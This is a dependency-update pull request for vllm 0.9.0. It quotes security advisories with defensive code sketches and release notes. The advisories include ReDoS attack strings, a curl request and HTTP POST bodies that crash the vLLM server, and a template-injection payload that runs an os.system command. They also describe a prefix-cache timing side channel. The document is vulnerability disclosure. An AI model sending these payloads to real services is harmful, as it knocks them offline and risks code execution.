Update dependency vllm to v0.9.0 [SECURITY] #8

renovate · 2025-05-28T18:27:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
vllm	`==0.8.5` -> `==0.9.0`

GitHub Vulnerability Alerts

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False
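
The proof-of-concept script itself is not reproduced in the advisory. The following is a minimal sketch of how such a measurement could be made, assuming Python's built-in re module and the pattern and payload shape quoted above. The helper names build_payload and time_match are hypothetical, and the repeat counts are deliberately small because, as the timings above show, larger inputs can take minutes.

```python
import re
import time

# Pattern copied from the advisory text; split across two literals for width.
TOOL_CALL_REGEX = re.compile(
    r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*"
    r"([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"
)


def build_payload(repeat: int) -> str:
    """Build the crafted input described in the advisory (hypothetical helper)."""
    return "[A(A=" + "\t)A(A=,\t" * repeat


def time_match(repeat: int) -> tuple[int, float, bool]:
    """Return (payload length, seconds spent matching, whether it matched)."""
    payload = build_payload(repeat)
    start = time.perf_counter()
    matched = TOOL_CALL_REGEX.match(payload) is not None
    elapsed = time.perf_counter() - start
    return len(payload), elapsed, matched


if __name__ == "__main__":
    # Keep repeat small: the cost grows very quickly with input length.
    for repeat in (1, 2, 3, 4):
        length, elapsed, matched = time_match(repeat)
        print(f"Length: {length}, Time: {elapsed:.4f} seconds, Match: {matched}")
```

The payload never contains a closing bracket, so the match always fails; the time is spent exploring the many ways the nested groups can split the input before giving up.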

Impact

Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

https://github.com/vllm-project/vllm/pull/18454
Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

Limit the input string length.
Use a non-recursive matching approach, or write a regex with stricter content constraints.
Consider using possessive quantifiers or atomic groups (supported by Python's built-in re module only since Python 3.11), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

Limit the length of model_output.
Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
Prefer re.finditer() and enforce a length constraint on each match.
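
One way to apply these suggestions without any regex is sketched below, assuming plain string search is acceptable for this marker. The function name and both length limits are hypothetical and are not taken from the vLLM fix. For well-formed output it is intended to return the same substrings as the lazy pattern: the text between each functools[ marker and the first ] that follows it.

```python
MAX_OUTPUT_LEN = 65_536   # hypothetical cap on model_output
MAX_PAYLOAD_LEN = 16_384  # hypothetical cap on a single bracketed payload


def extract_functools_payloads(
    model_output: str,
    max_output_len: int = MAX_OUTPUT_LEN,
    max_payload_len: int = MAX_PAYLOAD_LEN,
) -> list[str]:
    """Collect the text inside each functools[...] span using linear scans."""
    if len(model_output) > max_output_len:
        raise ValueError("model output exceeds the configured length limit")

    marker = "functools["
    payloads: list[str] = []
    pos = 0
    while True:
        start = model_output.find(marker, pos)
        if start == -1:
            break
        body_start = start + len(marker)
        end = model_output.find("]", body_start)
        if end == -1:
            # No closing bracket remains anywhere, so later markers cannot match.
            break
        if end - body_start <= max_payload_len:
            payloads.append(model_output[body_start:end])
        pos = end + 1
    return payloads
```

Because the scan position only moves forward, the total work stays proportional to the input length even when the text contains many unmatched markers.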

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

Use a more specific pattern (e.g., via JSON parsing).
Impose limits on current_text length.
Avoid using .* to capture large blocks of text; prefer structured parsing when possible.
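
A minimal sketch of the structured-parsing suggestion follows, assuming the goal is to read the value that follows the last "parameters": key. The function names and the length limit are hypothetical; this is not a drop-in replacement for the original expression (for example, it does not stop at newlines) and it is not the code used in the vLLM fix.

```python
import json
from typing import Any, Optional

MAX_TEXT_LEN = 65_536  # hypothetical cap on current_text


def extract_parameters_text(current_text: str, max_len: int = MAX_TEXT_LEN) -> Optional[str]:
    """Return the text after the last '"parameters":' key, or None."""
    if len(current_text) > max_len:
        return None
    key = '"parameters":'
    idx = current_text.rfind(key)  # single linear scan, no backtracking
    if idx == -1:
        return None
    return current_text[idx + len(key):].lstrip()


def parse_parameters(current_text: str, max_len: int = MAX_TEXT_LEN) -> Optional[Any]:
    """Decode the first complete JSON value after the key, if there is one."""
    remainder = extract_parameters_text(current_text, max_len)
    if remainder is None:
        return None
    try:
        # raw_decode tolerates trailing text after the first JSON value.
        value, _end = json.JSONDecoder().raw_decode(remainder)
    except json.JSONDecodeError:
        return None  # e.g. the JSON is still incomplete while streaming
    return value
```

Returning None for incomplete JSON lets a streaming caller simply wait for more text instead of re-running an expensive match.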

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

Limit the length of actual.
Prefer stepwise search for { and } or use a robust JSON extraction tool.
Recommend first locating the range with simple string search, then applying regex.
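
The "locate first, then parse" suggestion can be sketched with plain string search, as below. The function name and the length limit are hypothetical, and the sketch assumes the caller wants the span from the first { to the last }, which is what the greedy pattern selects on single-line input.

```python
import json
from typing import Any, Optional

MAX_ACTUAL_LEN = 1_000_000  # hypothetical cap on the text being checked


def extract_json_object(actual: str, max_len: int = MAX_ACTUAL_LEN) -> Optional[Any]:
    """Parse the span from the first '{' to the last '}', or return None."""
    if len(actual) > max_len:
        return None
    start = actual.find("{")
    end = actual.rfind("}")
    if start == -1 or end < start:
        return None  # missing or unbalanced braces: nothing to extract
    try:
        return json.loads(actual[start:end + 1])
    except json.JSONDecodeError:
        return None
```

Both searches are single linear scans, so unbalanced or very long input cannot trigger repeated rescans.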

Fix

https://github.com/vllm-project/vllm/pull/18454

CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PagedAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PagedAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment

GPU: NVIDIA A100 (40G)
CUDA: 11.8
PyTorch: 2.3.1
OS: Ubuntu 18.04
vLLM: v0.5.1
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PagedAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.
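
The AUC figures above can be read as the probability that a randomly chosen cache-miss request is slower than a randomly chosen cache-hit request, with 0.5 meaning the two are indistinguishable. A minimal sketch of that computation is given below; the function name is hypothetical and this is not the authors' analysis code.

```python
from typing import Sequence


def roc_auc(hit_times: Sequence[float], miss_times: Sequence[float]) -> float:
    """AUC for the rule 'slower TTFT means cache miss'.

    Computed as the fraction of (hit, miss) pairs in which the miss is
    slower, counting ties as half. This equals the area under the ROC curve.
    """
    if not hit_times or not miss_times:
        raise ValueError("both samples must be non-empty")
    wins = 0.0
    for hit in hit_times:
        for miss in miss_times:
            if miss > hit:
                wins += 1.0
            elif miss == hit:
                wins += 0.5
    return wins / (len(hit_times) * len(miss_times))
```

An attacker who collects TTFT samples for guessed prefixes could feed them to a function like this to judge how reliably a guess can be confirmed.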

Fixes

https://github.com/vllm-project/vllm/pull/17045
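
The release notes further down describe this fix as "Prevent side-channel attacks via cache salting". The general idea can be sketched as follows: mix a per-tenant salt into the key used to look up cached prefix blocks, so that identical tokens submitted under different salts never share a cache entry. The function name, the parameter names, and the use of SHA-256 are assumptions made for illustration and do not describe vLLM's actual implementation.

```python
import hashlib
from typing import Optional, Sequence


def block_hash(
    token_ids: Sequence[int],
    parent_hash: bytes = b"",
    cache_salt: Optional[str] = None,
) -> bytes:
    """Hypothetical cache key for one block of prompt tokens."""
    salt = (cache_salt or "").encode("utf-8")
    h = hashlib.sha256()
    h.update(len(salt).to_bytes(4, "big"))  # length prefix avoids ambiguity
    h.update(salt)
    h.update(parent_hash)                   # chains the key to earlier blocks
    h.update(",".join(str(t) for t in token_ids).encode("ascii"))
    return h.digest()
```

With a scheme like this, an attacker who does not know the victim's salt cannot produce a prefix hit on the victim's blocks, so TTFT no longer reveals whether a guess matched.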

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

Affected file: vllm/multimodal/hasher.py
Affected method: MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
- Incorrect cache hits, leading to abnormal responses
- Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.
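
The collision can be illustrated without any imaging library. The sketch below uses a hypothetical RawImage stand-in for PIL.Image.Image and SHA-256 as the hash; both are assumptions for illustration and are not the code in vllm/multimodal/hasher.py. It covers only mode and size, not the format or the info dictionary.

```python
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class RawImage:
    """Hypothetical stand-in for an image: mode, (width, height), raw pixels."""
    mode: str
    size: tuple[int, int]
    pixels: bytes


def hash_pixels_only(img: RawImage) -> str:
    """Mirrors the flawed approach: only the raw pixel bytes are hashed."""
    return hashlib.sha256(img.pixels).hexdigest()


def hash_with_metadata(img: RawImage) -> str:
    """Hash a length-prefixed header (mode and size) before the pixels."""
    header = f"{img.mode}|{img.size[0]}x{img.size[1]}".encode("ascii")
    h = hashlib.sha256()
    h.update(len(header).to_bytes(4, "big"))
    h.update(header)
    h.update(img.pixels)
    return h.hexdigest()


if __name__ == "__main__":
    tall = RawImage("L", (30, 100), bytes(3000))
    wide = RawImage("L", (100, 30), bytes(3000))
    print(hash_pixels_only(tall) == hash_pixels_only(wide))      # collision
    print(hash_with_metadata(tall) == hash_with_metadata(wide))  # distinct
```

The length prefix on the header keeps the boundary between metadata and pixel data unambiguous, so metadata bytes cannot be mistaken for pixels.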

Impact for other modalities
As for other modalities: video is converted into a multi-dimensional NumPy array whose dimensions describe the video's height, width, time, and so on, so the same problem exists there because the NumPy array is also serialized incorrectly.

For audio, librosa.load is not asked to preserve multiple channels (its mono option is left at the default), so librosa automatically downmixes the loaded audio to a single channel and returns a one-dimensional NumPy array. The array structure is therefore fixed and is not affected by this issue.

Fixes

https://github.com/vllm-project/vllm/pull/17378

CVE-2025-48942

Summary

Hitting the /v1/completions API with an invalid json_schema as a Guided Param will kill the vLLM server.

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vLLM with an invalid json_schema, e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.
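
The traceback shows a RuntimeError from the grammar compiler propagating out of the engine loop. One general way to contain this class of failure is to catch the compiler error at the point of the call and turn it into a request-level error. The sketch below illustrates that idea only: the exception class, the wrapper, and the compile_fn parameter are hypothetical, and this is not the change made in the linked fix.

```python
from typing import Any, Callable


class InvalidStructuredOutputError(ValueError):
    """Hypothetical request-level error a server could map to an HTTP 400."""


def compile_grammar_safely(compile_fn: Callable[[str], Any], grammar_spec: str) -> Any:
    """Call a grammar compiler and convert its failures into a client error.

    compile_fn stands in for whatever compiles the user-supplied schema or
    regex; only the affected request should fail, not the whole process.
    """
    try:
        return compile_fn(grammar_spec)
    except (RuntimeError, ValueError) as exc:
        raise InvalidStructuredOutputError(
            f"invalid structured output specification: {exc}"
        ) from exc
```

A caller would then catch InvalidStructuredOutputError for the single request and return an error response while the engine keeps serving other requests.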

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"
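
A check of this kind can be done before the schema reaches the native converter. The sketch below walks only the "properties" and "items" keywords and reports unsupported "type" values; the function name is hypothetical, and "integer" is added to the list above because it is a standard JSON Schema type, which is an assumption about what the backend accepts.

```python
from typing import Any

# The six types named in the advisory, plus "integer" (assumption, see lead-in).
ALLOWED_TYPES = frozenset(
    {"string", "number", "object", "boolean", "array", "null", "integer"}
)


def find_invalid_types(schema: Any, path: str = "$") -> list[str]:
    """Return a message for every unsupported "type" value that is found."""
    problems: list[str] = []
    if not isinstance(schema, dict):
        return problems  # boolean schemas and malformed nodes are out of scope

    declared = schema.get("type")
    if declared is not None:
        names = declared if isinstance(declared, list) else [declared]
        for name in names:
            if not isinstance(name, str) or name not in ALLOWED_TYPES:
                problems.append(f"{path}.type: unsupported type {name!r}")

    properties = schema.get("properties")
    if isinstance(properties, dict):
        for prop_name, sub_schema in properties.items():
            problems.extend(
                find_invalid_types(sub_schema, f"{path}.properties.{prop_name}")
            )

    items = schema.get("items")
    if isinstance(items, dict):
        problems.extend(find_invalid_types(items, f"{path}.items"))
    elif isinstance(items, list):
        for index, sub_schema in enumerate(items):
            problems.extend(find_invalid_types(sub_schema, f"{path}.items[{index}]"))

    return problems
```

A request whose tool parameters yield a non-empty list could be rejected with a client error before any grammar compilation is attempted.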

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of the runtime errors seen on the crash, depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.
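
A cheap first-pass filter for such patterns can be sketched with Python's built-in re module, as below. The function name and the length limit are hypothetical. Python's regex dialect is not the same as the one used by the native converter, so a pattern that passes this check may still be rejected later, and the native compile call still needs its own error handling.

```python
import re
from typing import Optional

MAX_PATTERN_LEN = 1024  # hypothetical cap on a user-supplied pattern


def check_pattern(pattern: str, max_len: int = MAX_PATTERN_LEN) -> Optional[str]:
    """Return an error message for an obviously bad pattern, else None."""
    if len(pattern) > max_len:
        return f"pattern longer than {max_len} characters"
    try:
        re.compile(pattern)
    except re.error as exc:
        return f"invalid regular expression: {exc}"
    return None
```

Returning a message instead of raising lets the caller collect problems from several schema fields and report them in a single error response.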

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note that the pattern field is set to an RCE payload, although it could just as well have been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}

Impact

Backend workers can be crashed, causing anyone using the inference engine to get 500 internal server errors on subsequent requests.

Fix

https://github.com/vllm-project/vllm/pull/17623

Release Notes

vllm-project/vllm (vllm)

`v0.9.0`

Compare Source

Highlights

This release features 649 commits, from 215 contributors (82 new contributors!)

vLLM has upgraded to PyTorch 2.7! (#16859) This is a breaking change for environment dependency.
- The default wheel has been upgraded from CUDA 12.4 to CUDA 12.8. We will distribute CUDA 12.6 wheel on GitHub artifact.
- As a general rule of thumb, our CUDA version policy follows PyTorch's CUDA version policy.
Enhanced NVIDIA Blackwell support. vLLM now ships with an initial set of optimized kernels on NVIDIA Blackwell for both attention and MLP.
- You can use our docker image, or install the FlashInfer nightly wheel with `pip install https://download.pytorch.org/whl/cu128/flashinfer/flashinfer_python-0.2.5%2Bcu128torch2.7-cp38-abi3-linux_x86_64.whl` and then set `VLLM_ATTENTION_BACKEND=FLASHINFER` for better performance.
- Upgraded support for the new FlashInfer main branch. (#15777)
- Please check out https://github.com/vllm-project/vllm/issues/18153 for the full roadmap.
Initial DP, EP, PD support for large scale inference
- EP:
  - Permute and unpermute kernel for moe optimization (#14568)
  - Modularize fused experts and integrate PPLX kernels (#15956)
  - Refactor pplx init logic to make it modular (prepare for deepep) (#18200)
  - Add ep group and all2all interface (#18077)
- DP:
  - Decouple engine process management and comms (#15977)
- PD:
  - NIXL Integration (#17751)
  - Local attention optimization for NIXL (#18170)
  - Support multiple kv connectors (#17564)
Migrate docs from Sphinx to MkDocs (#18145, #18610, #18614, #18616, #18622, #18626, #18627, #18635, #18637, #18657, #18663, #18666, #18713)

Notable Changes

Removal of CUDA 12.4 support due to PyTorch upgrade to 2.7.
Change top_k to be disabled with 0 (still accept -1 for now) (#17773)
The seed is now set to 0 by default for V1 Engine, meaning that different vLLM runs now yield the same outputs even if temperature > 0. This does not modify the random state in user code since workers are run in separate processes unless VLLM_USE_V1_MULTIPROCESSING=0. (#17929, #18741)

Model Enhancements

Support MiMo-7B (#17433), MiniMax-VL-01 (#16328), Ovis 1.6 (#17861), Ovis 2 (#15826), GraniteMoeHybrid 4.0 (#17497), FalconH1* (#18406), LlamaGuard4 (#17315)
- Please install the development version of transformers (from source) to use Falcon-H1.
Embedding models: nomic-embed-text-v2-moe (#17785), new class of gte models (#17986)
Progress in Hybrid Memory Allocator (#17394, #17479, #17474, #17483, #17193, #17946, #17945, #17999, #18001, #18593)
DeepSeek: perf enhancement by moving more calls into cuda-graph region (#17484, #17668), Function Call (#17784), MTP in V1 (#18435)
Qwen2.5-1M: Implements dual-chunk-flash-attn backend for dual chunk attention with sparse attention support (#11844)
Qwen2.5-VL speed enhancement via rotary_emb optimization (#17973)
InternVL models with Qwen2.5 backbone now support video inputs (#18499)

Performance, Production and Scaling

Support full cuda graph in v1 (#16072)
Pipeline Parallelism: MultiprocExecutor support (#14219), torchrun (#17827)
Support sequence parallelism combined with pipeline parallelism (#18243)
Async tensor parallelism using compilation pass (#17882)
Perf: Use small max_num_batched_tokens for A100 (#17885)
Fast Model Loading: Tensorizer support for V1 and LoRA (#17926)
Multi-modality: Automatically cast multi-modal input dtype before transferring device (#18756)

Security

Prevent side-channel attacks via cache salting (#17045)
Fix image hash collision in certain edge cases (#17378)
Add VLLM_ALLOW_INSECURE_SERIALIZATION env var (#17490)
